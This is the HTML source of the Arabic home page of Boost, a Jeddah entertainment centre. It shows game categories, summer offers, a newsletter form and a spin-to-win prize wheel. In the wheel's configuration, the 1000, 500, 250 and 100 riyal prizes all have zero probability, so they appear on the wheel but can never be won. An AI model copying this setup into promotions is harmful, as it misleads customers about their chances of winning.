	<ul><li class="wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-en wpml-ls-first-item wpml-ls-last-item wpml-ls-item-legacy-list-horizontal">
				<a href="en/" class="wpml-ls-link">
                    <span class="wpml-ls-native" lang="en">English</span></a>
			</li></ul>
</div>
        </div>
        <nav class="navbar navbar-expand-lg navbar-dark bg-dark">
            <!--  Show this only on mobile to medium screens  -->
            <a class="navbar-brand d-lg-none" href="/">
                                    <img src="https://boostsaudi.com/wp-content/uploads/2021/04/new-logo.png" height="194" width="388"/>
                <!--                <img src="https://boostsaudi.com/wp-content/uploads/2021/04/new-logo.png" height="194" width="388"/>-->
            </a>
            <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarToggle" aria-controls="navbarToggle" aria-expanded="false" aria-label="Toggle navigation">
                <!-- <span class="navbar-toggler-icon"></span> -->
                <i class="fas fa-bars"></i>
            </button>
            <!--  Use flexbox utility classes to change how the child elements are justified  -->
            <div class="collapse navbar-collapse justify-content-between" id="navbarToggle">
                <ul id="menu-menu-1" class="navbar-nav"><li class="nav-item">
                                            <a class="nav-link " href="/">الرئيسية</a>
                                        </li><li class="nav-item">
                                            <a class="nav-link " href="من-نحن/">من نحن</a>
                                        </li><li class="nav-item">
                                            <a class="nav-link " href="موقعك/">موقعنا</a>
                                        </li><li class="nav-item">
                                            <a class="nav-link " href="ديوانية-بووست/">ديوانية بووست</a>
                                        </li></ul>
                <!--   Show this only lg screens and up   -->
                <a class="navbar-brand d-none d-lg-block" href="/">
                                            <img src="https://boostsaudi.com/wp-content/uploads/2021/04/new-logo.png" height="194" width="388"/>
                    <!--                    <img src="https://boostsaudi.com/wp-content/uploads/2021/04/new-logo.png" height="194" width="388"/>-->
                </a>
                <ul id="menu-menu-2" class="navbar-nav"><li class="nav-item">
                                            <a class="nav-link " href="العب/">العب</a>
                                        </li><li class="nav-item">
                                            <a class="nav-link " href="الاكل/">كل</a>
                                        </li><li class="nav-item">
                                            <a class="nav-link " href="احتفل/">احتفل</a>
                                        </li><li class="nav-item">
                                            <a class="nav-link " href="en/">
<span class="wpml-ls-native" lang="en">English</span></a>
                                        </li></ul>            </div>
        </nav>
	</header><!-- #masthead -->
    <section>
        <div id="mySlick">
                <div class="item">
                    <div class="carousel-item-background">
                        <video class="bgVid" preload="auto" autoplay="true" loop="loop" playsinline autoplay muted loop muted="muted" volume="0">
                             <source src="https://boostsaudi.com/wp-content/uploads/2022/07/rool-1.mp4" type="video/mp4">
<!--							<source src="https://pt.net.sa/video/boost_compressed.mp4" type="video/mp4">-->
                        </video>
                    </div>
                </div>
        </div>
    </section>
<section class="full-section two-way-part with-slider">
    <div class="container-fluid">
        <div class="row">
            <div class="col-md-6">
                <div class="left-side">
                                        <div class="home-play-slider">
                                                    <div>
                                <img src="https://boostsaudi.com/wp-content/uploads/2021/10/Web-1920-–-2-2.png" alt="">
                            </div>
                                                    <div>
                                <img src="https://boostsaudi.com/wp-content/uploads/2021/10/Web-1920-–-3-1.png" alt="">
                            </div>
                                                    <div>
                                <img src="https://boostsaudi.com/wp-content/uploads/2021/10/Web-1920-–-4-1.png" alt="">
                            </div>
                                                    <div>
                                <img src="https://boostsaudi.com/wp-content/uploads/2021/10/Web-1920-–-5.png" alt="">
                            </div>
                                                    <div>
                                <img src="https://boostsaudi.com/wp-content/uploads/2021/10/Web-1920-–-6.png" alt="">
                            </div>
                                            </div>
                                    </div>
            </div>
            <div class="col-md-6">
                <div class="right-side">
                    <div>
                                                    <img src="https://boostsaudi.com/wp-content/uploads/2021/03/Web-1920-–-2-1.png"/>
                                            </div>
                    <div class="small-img">
                                                    <img src="https://boostsaudi.com/wp-content/uploads/2021/02/img2.png"/>
                                            </div>
                </div>
            </div>
        </div>
    </div>
</section><section class="full-section two-way-part style-two">    <div class="container-fluid">        <div class="row">            <div class="col-md-6">                <div class="right-side">                    <div>                                                    <img src="https://boostsaudi.com/wp-content/uploads/2021/03/item-1.png"/>                                            </div>                </div>            </div>            <div class="col-md-6">                <div class="left-side"><!--                    <h3>--><!--</h3>-->                    <p class="left-text">بووست ارهب و اكبر مركز ترفيهي في جدة مع اكثر من ١٠٠ لعبة مختلفة في سبعة فئات : <br/>
- العاب الواقع الافتراضي <br/>
- العاب المحاكاة<br/>
- الألعاب الحركية<br/>
- العاب الاركيد<br/>
- العاب الريدمشن<br/>
- العاب الجوائز <br/>
- ميني بووست</p>                </div>            </div>        </div>    </div></section><section>
    <div class="container-custom">
        <div class="row-custom">
            <div class="col-custom-md-3">
                <div class="left-side">
                        <div id="offer-slider">
                                <div class="item">
                                    <div class="item-wraper">
                                        <a data-target="#myModal1" data-toggle="modal" class="MainNavText" id="MainNavHelp1" href="#myModal1">HELP</a>
                                        <div class="item-header">
                                          <span class="slider-icon">
                                                <img src="https://boostsaudi.com/wp-content/uploads/2021/02/sec7.png"/>
                                          </span>
                                            <span></span>
                                        </div>
                                        <div class="image-wrap">
                                                <img src="https://boostsaudi.com/wp-content/uploads/2025/06/boost-hours-social.png"/>
                                        </div>
                                    </div>
                                </div>
                                <div class="item">
                                    <div class="item-wraper">
                                        <a data-target="#myModal2" data-toggle="modal" class="MainNavText" id="MainNavHelp2" href="#myModal2">HELP</a>
                                        <div class="item-header">
                                          <span class="slider-icon">
                                                <img src="https://boostsaudi.com/wp-content/uploads/2021/02/sec7.png"/>
                                          </span>
                                            <span></span>
                                        </div>
                                        <div class="image-wrap">
                                                <img src="https://boostsaudi.com/wp-content/uploads/2025/06/Boost-Summer-Offer01.png"/>
                                        </div>
                                    </div>
                                </div>
                                <div class="item">
                                    <div class="item-wraper">
                                        <a data-target="#myModal3" data-toggle="modal" class="MainNavText" id="MainNavHelp3" href="#myModal3">HELP</a>
                                        <div class="item-header">
                                          <span class="slider-icon">
                                                <img src="https://boostsaudi.com/wp-content/uploads/2021/02/sec7.png"/>
                                          </span>
                                            <span></span>
                                        </div>
                                        <div class="image-wrap">
                                                <img src="https://boostsaudi.com/wp-content/uploads/2025/06/Boost-Summer-Offer02.png"/>
                                        </div>
                                    </div>
                                </div>
                                <div class="item">
                                    <div class="item-wraper">
                                        <a data-target="#myModal4" data-toggle="modal" class="MainNavText" id="MainNavHelp4" href="#myModal4">HELP</a>
                                        <div class="item-header">
                                          <span class="slider-icon">
                                                <img src="https://boostsaudi.com/wp-content/uploads/2021/02/sec7.png"/>
                                          </span>
                                            <span></span>
                                        </div>
                                        <div class="image-wrap">
                                                <img src="https://boostsaudi.com/wp-content/uploads/2025/06/Boost-Summer-Offer03.png"/>
                                        </div>
                                    </div>
                                </div>
                                <div class="item">
                                    <div class="item-wraper">
                                        <a data-target="#myModal5" data-toggle="modal" class="MainNavText" id="MainNavHelp5" href="#myModal5">HELP</a>
                                        <div class="item-header">
                                          <span class="slider-icon">
                                                <img src="https://boostsaudi.com/wp-content/uploads/2021/02/sec7.png"/>
                                          </span>
                                            <span></span>
                                        </div>
                                        <div class="image-wrap">
                                                <img src="https://boostsaudi.com/wp-content/uploads/2025/06/Boost-Summer-Offer04.png"/>
                                        </div>
                                    </div>
                                </div>
                                <div class="item">
                                    <div class="item-wraper">
                                        <a data-target="#myModal6" data-toggle="modal" class="MainNavText" id="MainNavHelp6" href="#myModal6">HELP</a>
                                        <div class="item-header">
                                          <span class="slider-icon">
                                                <img src="https://boostsaudi.com/wp-content/uploads/2021/02/sec7.png"/>
                                          </span>
                                            <span></span>
                                        </div>
                                        <div class="image-wrap">
                                                <img src="https://boostsaudi.com/wp-content/uploads/2025/06/Boost-Summer-Offer06.png"/>
                                        </div>
                                    </div>
                                </div>
                                <div class="item">
                                    <div class="item-wraper">
                                        <a data-target="#myModal7" data-toggle="modal" class="MainNavText" id="MainNavHelp7" href="#myModal7">HELP</a>
                                        <div class="item-header">
                                          <span class="slider-icon">
                                                <img src="https://boostsaudi.com/wp-content/uploads/2021/02/sec7.png"/>
                                          </span>
                                            <span></span>
                                        </div>
                                        <div class="image-wrap">
                                                <img src="https://boostsaudi.com/wp-content/uploads/2025/06/Boost-Summer-Offer04.png"/>
                                        </div>
                                    </div>
                                </div>
                        </div>
                </div>
            </div>
            <div class="col-custom-md-9 one-of-four-container">
                        <div class="one-of-four">
                            <div class="card-item-with-name">
                                                                    <a href="ar/العب/"></a>
                                    <img src="https://boostsaudi.com/wp-content/uploads/2021/03/Artboard-8sect11s.png"/>
                            </div>
                        </div>
                        <div class="one-of-four">
                            <div class="card-item-with-name">
                                                                    <a href="ar/الاكل/"></a>
                                    <img src="https://boostsaudi.com/wp-content/uploads/2021/03/Artboard-5sect11s.png"/>
                            </div>
                        </div>
                        <div class="one-of-four">
                            <div class="card-item-with-name">
                                                                    <a href="ar/احتفل/"></a>
                                    <img src="https://boostsaudi.com/wp-content/uploads/2021/03/Artboard-6sect11s.png"/>
                            </div>
                        </div>
                        <div class="one-of-four">
                            <div class="card-item-with-name">
                                                                    <span></span>
                                    <img src="https://boostsaudi.com/wp-content/uploads/2021/03/Artboard-7sect11s.png"/>
                            </div>
                        </div>
            </div>
        </div>
    </div>
</section>
        <!--  to do modal-->
        <div class="news-popup modal fade" id="myModal1" tabindex="-1" role="dialog" aria-hidden="true">
            <div class="modal-dialog" role="document">
                <div class="modal-content">
                    <div class="modal-body">
                        <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                            <span aria-hidden="true">&times;</span>
                        </button>
                        <div class="image-top">
                                <img src="https://boostsaudi.com/wp-content/uploads/2025/06/boost-hours-stv.png"/>
                        </div>
                        <div class="offer details">
                            <div class="offer-left-side">
                                <p></p>
                            </div>
                            <div class="offer-right-side">
                                <p></p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!--  to do modal-->
        <div class="news-popup modal fade" id="myModal2" tabindex="-1" role="dialog" aria-hidden="true">
            <div class="modal-dialog" role="document">
                <div class="modal-content">
                    <div class="modal-body">
                        <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                            <span aria-hidden="true">&times;</span>
                        </button>
                        <div class="image-top">
                                <img src="https://boostsaudi.com/wp-content/uploads/2025/06/Boost-Summer-Offer01-Screen.png"/>
                        </div>
                        <div class="offer details">
                            <div class="offer-left-side">
                                <p></p>
                            </div>
                            <div class="offer-right-side">
                                <p></p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!--  to do modal-->
        <div class="news-popup modal fade" id="myModal3" tabindex="-1" role="dialog" aria-hidden="true">
            <div class="modal-dialog" role="document">
                <div class="modal-content">
                    <div class="modal-body">
                        <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                            <span aria-hidden="true">&times;</span>
                        </button>
                        <div class="image-top">
                                <img src="https://boostsaudi.com/wp-content/uploads/2025/06/Boost-Summer-Offer02-Screen.png"/>
                        </div>
                        <div class="offer details">
                            <div class="offer-left-side">
                                <p></p>
                            </div>
                            <div class="offer-right-side">
                                <p></p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!--  to do modal-->
        <div class="news-popup modal fade" id="myModal4" tabindex="-1" role="dialog" aria-hidden="true">
            <div class="modal-dialog" role="document">
                <div class="modal-content">
                    <div class="modal-body">
                        <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                            <span aria-hidden="true">&times;</span>
                        </button>
                        <div class="image-top">
                                <img src="https://boostsaudi.com/wp-content/uploads/2025/06/Boost-Summer-Offer03-Screen.png"/>
                        </div>
                        <div class="offer details">
                            <div class="offer-left-side">
                                <p></p>
                            </div>
                            <div class="offer-right-side">
                                <p></p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!--  to do modal-->
        <div class="news-popup modal fade" id="myModal5" tabindex="-1" role="dialog" aria-hidden="true">
            <div class="modal-dialog" role="document">
                <div class="modal-content">
                    <div class="modal-body">
                        <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                            <span aria-hidden="true">&times;</span>
                        </button>
                        <div class="image-top">
                                <img src="https://boostsaudi.com/wp-content/uploads/2025/06/Boost-Summer-Offer04-Screen.png"/>
                        </div>
                        <div class="offer details">
                            <div class="offer-left-side">
                                <p></p>
                            </div>
                            <div class="offer-right-side">
                                <p></p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!--  to do modal-->
        <div class="news-popup modal fade" id="myModal6" tabindex="-1" role="dialog" aria-hidden="true">
            <div class="modal-dialog" role="document">
                <div class="modal-content">
                    <div class="modal-body">
                        <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                            <span aria-hidden="true">&times;</span>
                        </button>
                        <div class="image-top">
                                <img src="https://boostsaudi.com/wp-content/uploads/2025/06/Boost-Summer-Offer06-Screen.png"/>
                        </div>
                        <div class="offer details">
                            <div class="offer-left-side">
                                <p></p>
                            </div>
                            <div class="offer-right-side">
                                <p></p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!--  to do modal-->
        <div class="news-popup modal fade" id="myModal7" tabindex="-1" role="dialog" aria-hidden="true">
            <div class="modal-dialog" role="document">
                <div class="modal-content">
                    <div class="modal-body">
                        <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                            <span aria-hidden="true">&times;</span>
                        </button>
                        <div class="image-top">
                                <img src="https://boostsaudi.com/wp-content/uploads/2025/06/Boost-Summer-Offer04-Screen.png"/>
                        </div>
                        <div class="offer details">
                            <div class="offer-left-side">
                                <p></p>
                            </div>
                            <div class="offer-right-side">
                                <p></p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
<footer>
    <div class="top-footer">
        <div class="container-fluid">
            <div class="row">
                <div class="col-md-5">
                    <div class="first-section-footer">
                        <h3>سجل بالقائمة البريدية</h3>
                        <div class="form-group" style="display: none">
                            <input type="text">
                            <input type="submit" value="سجل">
                        </div>
                        <div class="form-group">
                            <script>(function() {
	window.mc4wp = window.mc4wp || {
		listeners: [],
		forms: {
			on: function(evt, cb) {
				window.mc4wp.listeners.push(
					{
						event   : evt,
						callback: cb
					}
				);
			}
		}
	}
})();
</script><!-- Mailchimp for WordPress v4.9.10 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-563" method="post" data-id="563" data-name="En Form"><div class="mc4wp-form-fields"><input type="email" name="EMAIL" placeholder="Your email address" required/>
                            <input type="submit" value="GO"/></div><label style="display: none !important;">Leave this field empty if you're human: <input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off"/></label><input type="hidden" name="_mc4wp_timestamp" value="1751378593"/><input type="hidden" name="_mc4wp_form_id" value="563"/><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1"/><div class="mc4wp-response"></div></form><!-- / Mailchimp for WordPress Plugin -->                        </div>
                        <p>ابق على اطلاع من خلال الانضمام إلى النشرة الإخبارية لدينا</p>
                        <ul style="display: none;">
                                                                <li>
                                        <span>
                                            <a href="https://www.instagram.com/boostsaudi/">
                                                <i class="fab fa-instagram" aria-hidden="true"></i>                                            </a>
                                        </span>
                                    </li>
                                                                        <li>
                                        <span>
                                            <a href="https://twitter.com/boost_saudi?s=09">
                                                <i class="fab fa-twitter" aria-hidden="true"></i>                                            </a>
                                        </span>
                                    </li>
                                                                        <li>
                                        <span>
                                            <a href="https://www.facebook.com/boostsaudi/">
                                                <i class="fab fa-facebook-f" aria-hidden="true"></i>                                            </a>
                                        </span>
                                    </li>
                                                                        <li>
                                        <span>
                                            <a href="https://wa.me/966500878111">
                                                <i class="fab fa-whatsapp" aria-hidden="true"></i>                                            </a>
                                        </span>
                                    </li>
                                                                        <li>
                                        <span>
                                            <a href="mailto:ideas@boostsaudi.com">
                                                <i class="fas fa-envelope" aria-hidden="true"></i>                                            </a>
                                        </span>
                                    </li>
                                                                        <li>
                                        <span>
                                            <a href="https://g.page/boostsaudi?share">
                                                <i class="fas fa-map-marker-alt" aria-hidden="true"></i>                                            </a>
                                        </span>
                                    </li>
                                                            </ul>
                    </div>
                    <span class="footer_copyright copyright">© 2021 Boost</span>
                </div>
                <div class="col-md-2 menu-item">
                    <div class="left-side">
                        <ul id="menu-footer-1"><li><span><a href="العب/">العب</a></span></li><li><span><a href="الاكل/">كل</a></span></li><li><span><a href="احتفل/">احتفل</a></span></li></ul>                    </div>
                </div>
                <div class="col-md-2 menu-item">
                    <div class="left-side">
                        <ul id="menu-footer-2"><li><span><a href="موقعك/">موقعنا</a></span></li><li><span><a href="من-نحن/">من نحن</a></span></li><li><span><a href="/">الرئيسية</a></span></li></ul>                    </div>
                </div>
                <div class="col-md-3 item-contact-us">
                    <h3>تواصل معنا</h3>
                    <p><span>بريد الالكتروني:</span> <a href="mailto:ideas@boostsaudi.com">ideas@boostsaudi.com</a></p>
                    <p><span>للتوظيف:</span> <a target="_blank" href="https://forms.monday.com/forms/c5f75f8f72aa0a84a88b697f5ede1a3d">اضغط هنا</a></p>
                    <p><span>خدمة العملاء :</span> <a href="tel:+966500878111">+966500878111</a></p>
                </div>
            </div>
        </div>
    </div>
    <!--   ////////////////////////////////////////////////////////////////////  -->
            <div class="modal fade" id="myModalFeature" tabindex="-1" role="dialog" aria-hidden="true">
            <div class="modal-dialog" role="document">
                <div class="modal-content">
                    <div class="modal-body">
                        <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                            <span aria-hidden="true">&times;</span>
                        </button>
                        <div class="image-top">
<!--                            <img src="http://boostsaudi.com/wp-content/uploads/2021/04/1.jpg"/>-->
                            <img src="https://boostsaudi.com/wp-content/uploads/2022/08/POPUP-BARNS-07-1-1.png"/>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!--   ////////////////////////////////////////////////////////////////////  -->
    <div class="bottom-footer">
        <img src="https://boostsaudi.com/wp-content/themes/boost/assets/img/new-footer.png"/>
    </div>
    <div class="loader-ajax" style="display: none">
        <style>
            .loader-ajax p {
                text-align: center;
                font-size: 20px;
                font-weight: bold;
                margin-top: 5px;
                margin-bottom: 0;
            }
            .page-ajax-loading .loader-ajax {
                flex-direction: column;
            }
        </style>
        <img src="https://boostsaudi.com/wp-content/uploads/2021/04/new-logo.png" height="194" width="388"/>
        <p>استنى شويه</p>
    </div>
    <div class="foo" data-ip="81.171.60.17" data-check="1">
            </div>
    <div class="float-icon">
        <a target="_blank" href="https://wa.me/966500878111" class="whatsapp-float"><i class="fab fa-whatsapp"></i></a>
        <a target="_blank" href="https://g.page/boostsaudi?share" class="location-float"><i class="fas fa-map-marker-alt"></i></a>
    </div>
</footer>
<script>(function() {function maybePrefixUrlField () {
  const value = this.value.trim()
  if (value !== '' && value.indexOf('http') !== 0) {
    this.value = 'http://' + value
  }
}
const urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]')
for (let j = 0; j < urlFields.length; j++) {
  urlFields[j].addEventListener('blur', maybePrefixUrlField)
}
})();</script>	<script type="text/javascript">
		(function () {
			var c = document.body.className;
			c = c.replace(/woocommerce-no-js/, 'woocommerce-js');
			document.body.className = c;
		})();
	</script>
	<script src="https://kenwheeler.github.io/slick/slick/slick.js?ver=1.0.0" id="boost-slick-js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js?ver=1.0.0" id="boost-bootstrap-js"></script>
<script src="https://boostsaudi.com/wp-content/themes/boost/assets/js/plugins.js?ver=1.0.0" id="boost-plugins-js"></script>
<script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyCPJMCOUS20kwYPE9AqHwwHsOCggkXVdio&amp;callback=initMap&amp;ver=1.0.0" id="boost-googleapis-js"></script>
<script src="https://kit.fontawesome.com/f8990b0ff5.js?ver=1.0.0" id="sakura-fontawesome-js"></script>
<script src="https://boostsaudi.com/wp-content/themes/boost/assets/dist/superwheel.js?ver=1.0.0" id="superwheel-script-js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/2.0.5/FileSaver.min.js?ver=1.0.0" id="fileSaver-script-js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-cookie/1.4.1/jquery.cookie.min.js?ver=1.0.0" id="cookie-script-js"></script>
<script src="https://rawgit.com/schmich/instascan-builds/master/instascan.min.js?ver=6.4.2" id="instascan-js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/dropzone/5.9.2/min/dropzone.min.js" id="dropzone-script-js"></script>
<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js" id="jquery-ui-script-js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-steps/1.1.0/jquery.steps.min.js" id="jquery-steps-js"></script>
<script id="booking-script-js-extra">
var bookingAjax = {"ajaxurl":"https:\/\/boostsaudi.com\/wp-admin\/admin-ajax.php","upload":"/","delete":"/","min_child_school":"50"};
</script>
<script src="https://boostsaudi.com/wp-content/themes/boost/assets/js/booking.js?ver=1.0.0" id="booking-script-js"></script>
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@10?ver=1.0.0" id="sweetalert2-script-js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/2.1.3/TweenMax.min.js?ver=1.0.0" id="tweenmax-script-js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/2.1.3/utils/Draggable.min.js?ver=1.0.0" id="draggable-script-js"></script>
<script src="https://boostsaudi.com/wp-content/themes/boost/assets/spin/js/ThrowPropsPlugin.min.js?ver=1.0.0" id="throwpropsplugin-script-js"></script>
<script src="https://boostsaudi.com/wp-content/themes/boost/assets/spin/js/Spin2WinWheel.js?ver=1.0.0" id="spin2winwheel-script-js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/2.1.3/plugins/TextPlugin.min.js?ver=1.0.0" id="textplugin-script-js"></script>
<script id="spin-main-script-js-extra">
var spinitem = {"my_arr":"{\"colorArray\":[\"#544191\",\"#e51c6a\",\"#65c1d1\",\"#fae81b\",\"#df3b8c\",\"#856aab\",\"#3461aa\",\"#ec6da0\",\"#3461aa\",\"#2b2a62\"],\"segmentValuesArray\":[{\"probability\":0,\"type\":\"string\",\"value\":\"1000 \\u0631\\u064a\\u0627\\u0644\",\"win\":false,\"resultText\":\"result_1_count\",\"userData\":{\"score\":\"1000 \\u0631\\u064a\\u0627\\u0644\"}},{\"probability\":0,\"type\":\"string\",\"value\":\"500 \\u0631\\u064a\\u0627\\u0644\",\"win\":false,\"resultText\":\"result_2_count\",\"userData\":{\"score\":\"500 \\u0631\\u064a\\u0627\\u0644\"}},{\"probability\":0,\"type\":\"string\",\"value\":\"250 \\u0631\\u064a\\u0627\\u0644\",\"win\":false,\"resultText\":\"result_3_count\",\"userData\":{\"score\":\"250 \\u0631\\u064a\\u0627\\u0644\"}},{\"probability\":0,\"type\":\"string\",\"value\":\"100 \\u0631\\u064a\\u0627\\u0644\",\"win\":false,\"resultText\":\"result_4_count\",\"userData\":{\"score\":\"100 \\u0631\\u064a\\u0627\\u0644\"}},{\"probability\":4,\"type\":\"string\",\"value\":\"50 \\u0631\\u064a\\u0627\\u0644\",\"win\":false,\"resultText\":\"result_5_count\",\"userData\":{\"score\":\"50 \\u0631\\u064a\\u0627\\u0644\"}},{\"probability\":10,\"type\":\"string\",\"value\":\"45 \\u0631\\u064a\\u0627\\u0644\",\"win\":false,\"resultText\":\"result_6_count\",\"userData\":{\"score\":\"45 \\u0631\\u064a\\u0627\\u0644\"}},{\"probability\":16,\"type\":\"string\",\"value\":\"40 \\u0631\\u064a\\u0627\\u0644\",\"win\":false,\"resultText\":\"result_7_count\",\"userData\":{\"score\":\"40 \\u0631\\u064a\\u0627\\u0644\"}},{\"probability\":23,\"type\":\"string\",\"value\":\"30 \\u0631\\u064a\\u0627\\u0644\",\"win\":false,\"resultText\":\"result_8_count\",\"userData\":{\"score\":\"30 \\u0631\\u064a\\u0627\\u0644\"}},{\"probability\":24,\"type\":\"string\",\"value\":\"20 \\u0631\\u064a\\u0627\\u0644\",\"win\":false,\"resultText\":\"result_9_count\",\"userData\":{\"score\":\"20 \\u0631\\u064a\\u0627\\u0644\"}},{\"probability\":23,\"type\":\"string\",\"value\":\"15 \\u0631\\u064a\\u0627\\u0644\",\"win\":false,\"resultText\":\"result_10_count\",\"userData\":{\"score\":\"15 \\u0631\\u064a\\u0627\\u0644\"}}],\"svgWidth\":1024,\"svgHeight\":768,\"wheelStrokeColor\":\"#D0BD0C\",\"wheelStrokeWidth\":18,\"wheelSize\":700,\"wheelTextOffsetY\":80,\"wheelTextColor\":\"#EDEDED\",\"wheelTextSize\":\"2.3em\",\"wheelImageOffsetY\":40,\"wheelImageSize\":50,\"centerCircleSize\":360,\"centerCircleStrokeColor\":\"#F1DC15\",\"centerCircleStrokeWidth\":12,\"centerCircleFillColor\":\"#EDEDED\",\"centerCircleImageUrl\":\"https:\\\/\\\/boostsaudi.com\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/new-logo.png\",\"centerCircleImageWidth\":300,\"centerCircleImageHeight\":400,\"segmentStrokeColor\":\"#E2E2E2\",\"segmentStrokeWidth\":4,\"centerX\":512,\"centerY\":384,\"hasShadows\":false,\"numSpins\":-1,\"spinDestinationArray\":[],\"minSpinDuration\":6,\"gameOverText\":\"THANK YOU FOR PLAYING SPIN2WIN WHEEL. COME AND PLAY AGAIN SOON!\",\"invalidSpinText\":\"INVALID SPIN. PLEASE SPIN AGAIN.\",\"introText\":\"\",\"hasSound\":true,\"gameId\":\"9a0232ec06bc431114e2a7f3aea03bbe2164f1aa\",\"clickToSpin\":true,\"spinDirection\":\"ccw\",\"disabledText\":\"You have no more spins today\"}"};
var popupspin1 = {"my_arr":"{\"colorArray\":[\"#fae81b\",\"#df3b8c\",\"#65c1d1\",\"#544191\",\"#fae81b\",\"#df3b8c\",\"#1079bc\",\"#ec6da0\"],\"segmentValuesArray\":[{\"probability\":29,\"type\":\"string\",\"value\":\"Boost party\",\"win\":false,\"resultText\":\"Boost party\",\"userData\":{\"score\":\"Boost party\",\"resultImage\":\"https:\\\/\\\/boostsaudi.com\\\/wp-content\\\/uploads\\\/2021\\\/08\\\/art3.png\"}},{\"probability\":29,\"type\":\"string\",\"value\":\"Bowling lounge\",\"win\":false,\"resultText\":\"Bowling lounge\",\"userData\":{\"score\":\"Bowling lounge\",\"resultImage\":\"https:\\\/\\\/boostsaudi.com\\\/wp-content\\\/uploads\\\/2021\\\/08\\\/art2.png\"}},{\"probability\":7,\"type\":\"string\",\"value\":\"Stuntman Jump\",\"win\":false,\"resultText\":\"Stuntman Jump\",\"userData\":{\"score\":\"Stuntman Jump\",\"resultImage\":\"https:\\\/\\\/boostsaudi.com\\\/wp-content\\\/uploads\\\/2021\\\/07\\\/Artboard-9logo.png\"}},{\"probability\":7,\"type\":\"string\",\"value\":\"F1 Racing\",\"win\":false,\"resultText\":\"F1 Racing\",\"userData\":{\"score\":\"F1 Racing\",\"resultImage\":\"https:\\\/\\\/boostsaudi.com\\\/wp-content\\\/uploads\\\/2021\\\/07\\\/Artboard-8logo.png\"}},{\"probability\":7,\"type\":\"string\",\"value\":\"Super Keeper\",\"win\":false,\"resultText\":\"Super Keeper\",\"userData\":{\"score\":\"Super Keeper\",\"resultImage\":\"https:\\\/\\\/boostsaudi.com\\\/wp-content\\\/uploads\\\/2021\\\/07\\\/Artboard-6logo.png\"}},{\"probability\":7,\"type\":\"string\",\"value\":\"Beat Saber\",\"win\":false,\"resultText\":\"Beat Saber\",\"userData\":{\"score\":\"Beat Saber\",\"resultImage\":\"https:\\\/\\\/boostsaudi.com\\\/wp-content\\\/uploads\\\/2021\\\/07\\\/Artboard-5logo.png\"}},{\"probability\":7,\"type\":\"string\",\"value\":\"Donut Slide\",\"win\":false,\"resultText\":\"Donut Slide\",\"userData\":{\"score\":\"Donut Slide\",\"resultImage\":\"https:\\\/\\\/boostsaudi.com\\\/wp-content\\\/uploads\\\/2021\\\/07\\\/Artboard-7logo.png\"}},{\"probability\":7,\"type\":\"string\",\"value\":\"Mini Golf\",\"win\":false,\"resultText\":\"Mini Golf\",\"userData\":{\"score\":\"Mini Golf\",\"resultImage\":\"https:\\\/\\\/boostsaudi.com\\\/wp-content\\\/uploads\\\/2021\\\/07\\\/Artboard-3logo.png\"}}],\"svgWidth\":1024,\"svgHeight\":768,\"wheelStrokeColor\":\"#D0BD0C\",\"wheelStrokeWidth\":18,\"wheelSize\":700,\"wheelTextOffsetY\":80,\"wheelTextColor\":\"#EDEDED\",\"wheelTextSize\":\"2.3em\",\"wheelImageOffsetY\":40,\"wheelImageSize\":50,\"centerCircleSize\":360,\"centerCircleStrokeColor\":\"#F1DC15\",\"centerCircleStrokeWidth\":12,\"centerCircleFillColor\":\"#EDEDED\",\"centerCircleImageUrl\":\"https:\\\/\\\/boostsaudi.com\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/new-logo.png\",\"centerCircleImageWidth\":300,\"centerCircleImageHeight\":400,\"segmentStrokeColor\":\"#E2E2E2\",\"segmentStrokeWidth\":4,\"centerX\":512,\"centerY\":384,\"hasShadows\":false,\"numSpins\":-1,\"spinDestinationArray\":[],\"minSpinDuration\":6,\"gameOverText\":\"THANK YOU FOR PLAYING SPIN2WIN WHEEL. COME AND PLAY AGAIN SOON!\",\"invalidSpinText\":\"INVALID SPIN. PLEASE SPIN AGAIN.\",\"introText\":\"\",\"hasSound\":true,\"gameId\":\"9a0232ec06bc431114e2a7f3aea03bbe2164f1aa\",\"clickToSpin\":true,\"spinDirection\":\"ccw\",\"disabledText\":\"You have no more spins today\"}"};
</script>
<script src="https://boostsaudi.com/wp-content/themes/boost/assets/spin/js/index.js?ver=1.0.0" id="spin-main-script-js"></script>
<script defer src="https://boostsaudi.com/wp-content/plugins/mailchimp-for-wp/assets/js/forms.js?ver=4.9.10" id="mc4wp-forms-api-js"></script>
